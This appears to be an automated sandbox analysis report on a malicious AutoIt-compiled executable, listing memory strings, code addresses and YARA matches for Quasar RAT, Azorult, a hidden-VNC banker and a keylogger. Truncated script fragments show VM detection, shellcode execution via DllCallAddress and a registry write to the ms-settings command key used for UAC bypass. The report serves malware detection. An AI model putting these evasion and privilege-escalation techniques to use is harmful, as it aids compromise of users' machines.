Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: This is a third-party compiled AutoIt script. 7_2_00DB3B3A
Source: CVbJSUXraQ.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: This is a third-party compiled AutoIt script. 10_2_00A43B3A
Source: SystemPropertiesPerformance.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
AutoIt script contains suspicious strings
Source: CVbJSUXraQ.exe AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: CVbJSUXraQ.exe AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: CVbJSUXraQ.exe AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: CVbJSUXraQ.exe AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: CVbJSUXraQ.exe AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: CVbJSUXraQ.exe AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: SystemPropertiesPerformance.exe.1.dr AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: SystemPropertiesPerformance.exe.1.dr AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: SystemPropertiesPerformance.exe.1.dr AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: SystemPropertiesPerformance.exe.1.dr AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: SystemPropertiesPerformance.exe.1.dr AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: SystemPropertiesPerformance.exe.1.dr AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Detected potential crypto function
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DBFCE0 1_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DBE6A0 1_2_00DBE6A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DBDF00 1_2_00DBDF00
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DC8808 1_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DDD975 1_2_00DDD975
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DE62D2 1_2_00DE62D2
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB1287 1_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DD1484 1_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E37DDB 1_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DE6DB6 1_2_00DE6DB6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DDBDA6 1_2_00DDBDA6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DC66E1 1_2_00DC66E1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DC6F9E 1_2_00DC6F9E
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB104C 4_2_00AB104C
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AC50BE 4_2_00AC50BE
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AC4C28 4_2_00AC4C28
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AC59EA 4_2_00AC59EA
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AC5554 4_2_00AC5554
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADE153 4_2_00ADE153
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AC5E80 4_2_00AC5E80
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AC6263 4_2_00AC6263
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADD39B 4_2_00ADD39B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AD2F13 4_2_00AD2F13
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C788A0 5_2_00C788A0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C694B0 5_2_00C694B0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C63C6C 5_2_00C63C6C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7B420 5_2_00C7B420
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C809D4 5_2_00C809D4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C72DE0 5_2_00C72DE0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C76984 5_2_00C76984
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C799B0 5_2_00C799B0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C84174 5_2_00C84174
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7DED4 5_2_00C7DED4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7FAD4 5_2_00C7FAD4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7EADC 5_2_00C7EADC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C766A4 5_2_00C766A4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C73A10 5_2_00C73A10
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C687CC 5_2_00C687CC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C727D4 5_2_00C727D4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C803EC 5_2_00C803EC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C733EC 5_2_00C733EC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C84BE4 5_2_00C84BE4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C82F5C 5_2_00C82F5C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6B36C 5_2_00C6B36C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C68F68 5_2_00C68F68
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C78F34 5_2_00C78F34
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CA9878 5_2_00CA9878
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CAA1A4 5_2_00CAA1A4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CA9D0E 5_2_00CA9D0E
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CAAAD0 5_2_00CAAAD0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CAAEB3 5_2_00CAAEB3
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CAA63A 5_2_00CAA63A
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CB7B63 5_2_00CB7B63
Source: C:\Users\user\AppData\Local\Temp\windef.exe Code function: 6_2_00F12EC4 6_2_00F12EC4
Source: C:\Users\user\AppData\Local\Temp\windef.exe Code function: 6_2_00F18FCC 6_2_00F18FCC
Source: C:\Users\user\AppData\Local\Temp\windef.exe Code function: 6_2_00F17482 6_2_00F17482
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC8808 7_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC3030 7_2_00DC3030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD21C5 7_2_00DD21C5
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD3187 7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD1978 7_2_00DD1978
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DB1287 7_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DDCB21 7_2_00DDCB21
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DBFCE0 7_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD1484 7_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD25FA 7_2_00DD25FA
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00E37DDB 7_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD1D90 7_2_00DD1D90
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC5520 7_2_00DC5520
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC5760 7_2_00DC5760
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DBDF00 7_2_00DBDF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A63187 10_2_00A63187
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A4FCE0 10_2_00A4FCE0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A4E6A0 10_2_00A4E6A0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A4DF00 10_2_00A4DF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A53030 10_2_00A53030
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A58808 10_2_00A58808
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A621C5 10_2_00A621C5
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A6F1D9 10_2_00A6F1D9
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A6D975 10_2_00A6D975
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A61978 10_2_00A61978
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A41287 10_2_00A41287
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A762D2 10_2_00A762D2
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A6CB21 10_2_00A6CB21
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A61484 10_2_00A61484
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A7242E 10_2_00A7242E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A6BDA6 10_2_00A6BDA6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A76DB6 10_2_00A76DB6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A61D90 10_2_00A61D90
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A625FA 10_2_00A625FA
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00AC7DDB 10_2_00AC7DDB
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A55520 10_2_00A55520
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A566E1 10_2_00A566E1
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A56F9E 10_2_00A56F9E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A55760 10_2_00A55760
Abnormal high CPU Usage
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses 32bit PE files
Source: CVbJSUXraQ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: CVbJSUXraQ.exe, type: SAMPLE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: CVbJSUXraQ.exe, type: SAMPLE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: CVbJSUXraQ.exe, type: SAMPLE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
